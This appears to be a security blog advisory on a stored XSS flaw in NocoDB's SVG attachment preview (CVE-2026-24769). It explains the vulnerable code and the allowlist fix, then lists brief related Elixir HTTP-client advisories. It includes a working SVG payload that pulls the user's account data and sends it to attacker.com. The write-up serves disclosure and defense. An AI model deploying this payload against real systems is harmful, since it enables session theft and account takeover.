Jan 29, 2026·6 min read·64 visits
NocoDB treated all 'images' as safe to preview, forgetting that SVGs are basically executable XML. Attackers can upload a weaponized SVG, wait for an admin to preview it, and steal their session tokens.
A critical Stored Cross-Site Scripting (XSS) vulnerability in NocoDB allows authenticated attackers to upload malicious SVG attachments. Due to lax MIME type checking and unsafe content disposition handling, these files execute arbitrary JavaScript in the victim's browser upon preview, leading to potential account takeover.
NocoDB is the darling of the open-source world right now. It promises to turn your boring MySQL or PostgreSQL database into a shiny, Airtable-like smart spreadsheet. It’s a "no-code" platform, which usually translates to "we abstracted away the complexity so you don't have to look at it." Unfortunately, abstraction often hides sins.
In this case, the sin lies in how NocoDB handles attachments. Like any good collaboration tool, it lets you upload files—PDFs, JPEGs, and yes, SVGs—and attach them to rows in your database. It even offers a handy "Preview" feature so you don't have to download every single receipt your finance team uploads.
But here's the catch: When you build a feature to display images inline, you better be absolutely certain that the "image" is actually a picture, and not a trojan horse made of XML and hatred. CVE-2026-24769 is what happens when a developer assumes that if a file type contains the word "image", it must be harmless.
The root of this vulnerability is a classic developer shortcut: string matching without context. In the web world, we have MIME types to tell us what a file is. image/jpeg is a photo. application/json is data. image/svg+xml is... well, it's complicated.
Scalable Vector Graphics (SVG) are not raster images like PNGs or JPGs. They are XML documents that describe lines, shapes, and colors. Crucially, the SVG standard supports the <script> tag and event handlers like onload. If a browser renders an SVG inline (i.e., not as a downloaded file), it parses that XML and executes any JavaScript it finds. It effectively becomes an HTML page.
NocoDB's logic for deciding whether to show a "Preview" button was simple. Too simple. It checked if the file's MIME type included the string "image".
> [!NOTE]
> The Logic Flaw:
> Does image/svg+xml include the word "image"? Yes.
> Is it safe to render inline? Absolutely not.
By treating SVGs the same way as JPEGs, NocoDB rolled out the red carpet for Stored XSS. The application essentially said, "Oh, it's an image? Go ahead and run whatever code is inside it in the context of my origin."
Let's look at the code that made this possible. The vulnerability existed in attachmentHelpers.ts. The developers needed a way to determine if a file was previewable. Their solution was this helper function:
// Vulnerable logic in attachmentHelpers.ts
const previewableMimeTypes = ['image', 'pdf', 'video', 'audio'];
export const isPreviewAllowed = (args: { mimetype?: string } = {}) => {
const { mimetype } = args;
if (!mimetype) return false;
// THE BUG: Loose substring matching
return previewableMimeTypes.some((type) => mimetype.includes(type));
};This is a lazy check. It matches image/png, sure, but it also matches image/svg+xml. Once the check passes, the frontend requests the file. This leads us to the second failure in attachments.controller.ts, where the server delivers the payload:
// Vulnerable endpoint in attachments.controller.ts
@Get('/dltemp/:param(*)')
async fileReadv3(@Param('param') param: string, @Res() res: Response) {
// THE BUG: Trusting query params for headers
res.setHeader('Content-Type', queryParams.contentType);
res.setHeader('Content-Disposition', queryParams.contentDisposition);
// Serving the raw file
res.sendFile(file.path);
}The server blindly accepts Content-Disposition: inline (often derived from client-side logic or query params) and serves the file with the image/svg+xml content type. This combination forces the browser to render the SVG instead of downloading it, triggering the XSS.
Exploiting this requires an authenticated account, but in a corporate environment using NocoDB, that's a low bar (think: a contractor or a low-level employee). The attacker simply creates a valid SVG file that contains a nasty surprise.
Here is what a weaponized logo.svg looks like:
<svg xmlns="http://www.w3.org/2000/svg"
onload="fetch('/api/v1/auth/user/me').then(r=>r.json()).then(d=>fetch('https://attacker.com/log?d='+btoa(JSON.stringify(d))))">
<rect width="100" height="100" fill="red" />
<script>
// Alternatively, just steal the token directly
// alert('XSS: ' + document.cookie);
</script>
<text x="10" y="50" font-family="Verdana" font-size="35" fill="blue">Hello Admin!</text>
</svg>The Attack Chain:
onload event fires immediately. The script fetches the victim's user details (including sensitive API keys if available in the dashboard context) and sends them to attacker.com.Because the script runs in the origin of the NocoDB instance, it bypasses Same-Origin Policy (SOP) protections.
You might be thinking, "So what? They popped an alert box." But in the context of a database management tool, XSS is catastrophic. NocoDB is often used to manage sensitive business data, customer lists, and internal secrets.
With XSS, an attacker can:
Authorisation header or session cookies, effectively becoming the victim.This isn't just a UI bug; it's a full compromise of the data stored within the platform.
The fix, implemented in version 0.301.0, is a lesson in being specific. The developers moved from a blocklist/loose-match approach to a strict allowlist approach.
Instead of checking if the MIME type includes "image", they now check if the MIME type is exactly one of the safe types (e.g., image/jpeg, image/png, image/gif). Crucially, image/svg+xml is excluded from the preview allowlist.
Furthermore, the backend controller was hardened. It no longer blindly trusts query parameters to set headers. It likely forces Content-Disposition: attachment for any file type that isn't on a strictly vetted safe list. This forces the browser to download the file rather than render it, neutering the XSS payload even if it is uploaded.
Lesson Learned: Never trust a file just because it claims to be an image. If it's XML-based, it's code.
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P| Product | Affected Versions | Fixed Version |
|---|---|---|
NocoDB NocoDB | < 0.301.0 | 0.301.0 |
| Attribute | Detail |
|---|---|
| CVE ID | CVE-2026-24769 |
| CVSS Score | 8.5 (High) |
| Attack Vector | Network (Stored XSS) |
| CWE | CWE-79 (XSS) |
| Discovery | GitHub Security Lab AI |
| Exploit Status | PoC Available |
CVE-2026-48861 is a client-side HTTP request-line CRLF (Carriage Return Line Feed) injection vulnerability in the popular Elixir HTTP client library, Mint. The vulnerability permits HTTP Request Splitting and HTTP Request Smuggling when an application forwards untrusted, attacker-controlled inputs to Mint's HTTP client requests as either the HTTP request method or target. By embedding CRLF characters within these parameters, an attacker can terminate the request line prematurely, inject malicious headers, or pipeline entirely independent requests. These smuggled requests are then processed by upstream or downstream proxy servers as separate HTTP queries on the same TCP connection. While Mint version 1.7.0 introduced target validation to secure the request target, the HTTP request method parameter remained completely unvalidated. This flaw allows attackers to bypass routing filters, access restricted internal APIs, or poison HTTP caches under default configurations.
An Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling) vulnerability in the Elixir Mint HTTP client allows attacker-controlled HTTP/1 servers to desynchronize response framing on shared connections due to over-lenient parsing of sign-prefixed Content-Length headers.
An allocation of resources without limits or throttling vulnerability in Elixir Mint allows an attacker-controlled HTTP/2 server to exhaust memory in a Mint client. The vulnerability is exploited by sending a HEADERS frame without the END_HEADERS flag followed by an infinite stream of CONTINUATION frames. Because the client lacks limits on the incoming header-block accumulator, the client continuously consumes memory until an out-of-memory crash occurs.
CVE-2026-48596 is an Improper Neutralization of CRLF Sequences in HTTP Headers (HTTP Request/Response Splitting, CWE-113) in the Elixir Tesla HTTP client. The flaw resides in how multipart content-type parameters are joined and serialized, enabling attackers to inject arbitrary headers or split HTTP requests when applications pass untrusted inputs to the parameters of multipart uploads.
An improper handling of highly compressed data (decompression bomb) vulnerability exists in the Elixir Tesla HTTP client when utilizing response decompression middlewares. By serving highly compressed responses or stacked content-encoding headers, a malicious server can cause arbitrary heap exhaustion, leading to a denial of service (DoS) crash in the BEAM virtual machine.
A high-severity security vulnerability in Elixir's Tesla HTTP client library (CVE-2026-48595) allows unauthenticated remote attackers to harvest sensitive credentials, including Authorization headers and cookies. The flaw resides in the 'Tesla.Middleware.FollowRedirects' component, which performs case-sensitive lookups when stripping credentials during cross-origin redirects. Because HTTP headers are case-insensitive by RFC specifications, standard canonical casing (e.g., 'Authorization') bypasses the lowercase-only blocklist, leaking tokens to untrusted external redirect destinations.